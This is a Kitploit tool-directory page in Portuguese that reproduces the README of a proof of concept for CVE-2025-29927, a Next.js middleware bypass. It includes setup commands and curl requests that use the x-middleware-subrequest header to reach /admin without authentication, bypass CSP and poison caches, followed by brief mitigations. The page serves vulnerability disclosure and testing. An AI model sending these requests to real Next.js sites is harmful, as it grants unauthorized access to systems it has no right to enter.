Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 Proof of Concept | Kitploit
Ferramentas/GitHubGitHub/eve-satoru/poc-cve-2025-29927
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWAF BypassWeb Security
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 Proof of Concept

Ver Repositório
31há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-29927: Prova de Conceito de Bypass de Middleware do Next.js

Visão Geral

Este PoC demonstra o CVE-2025-29927, uma vulnerabilidade no middleware do Next.js que permite a atacantes contornar mecanismos de autenticação, autorização e CSP usando o cabeçalho x-middleware-subrequest.

Versões Afetadas

Versões do Next.js de 11.1.4 a 15.1.7

Configuração e Instalação

1️⃣ Clone e Instale o PoC

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

O aplicativo será iniciado em http://localhost:3000

Cenários de Exploração

1️⃣ Bypass de Autenticação e Autorização (cURL)

1- Use x-middleware-subrequest para obter acesso não autorizado:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 Resultado esperado: A resposta retorna admin admin, mesmo que a autenticação tenha sido contornada.

result screenshot

2️⃣ Bypass de CSP para Injeção de XSS

Se o CSP for aplicado via middleware, contorne-o:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 Resultado esperado: O CSP é ignorado, permitindo a execução de scripts maliciosos.

3️⃣ Ataque de Negação de Serviço por Envenenamento de Cache (CPDoS)

Explore o envenenamento de cache forçando uma resposta malformada:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 Resultado esperado: A página é armazenada em cache com conteúdo incorreto, interrompendo usuários normais.

Estratégias de Mitigação

  • ✅ Valide a lógica do middleware para evitar bypass .
  • ✅ Atualize o Next.js assim que uma versão corrigida for lançada .

Créditos

🔍 Descoberto por: Allam Rachid (zhero;) & Allam Yasser (inzo_)

Baixar ferramenta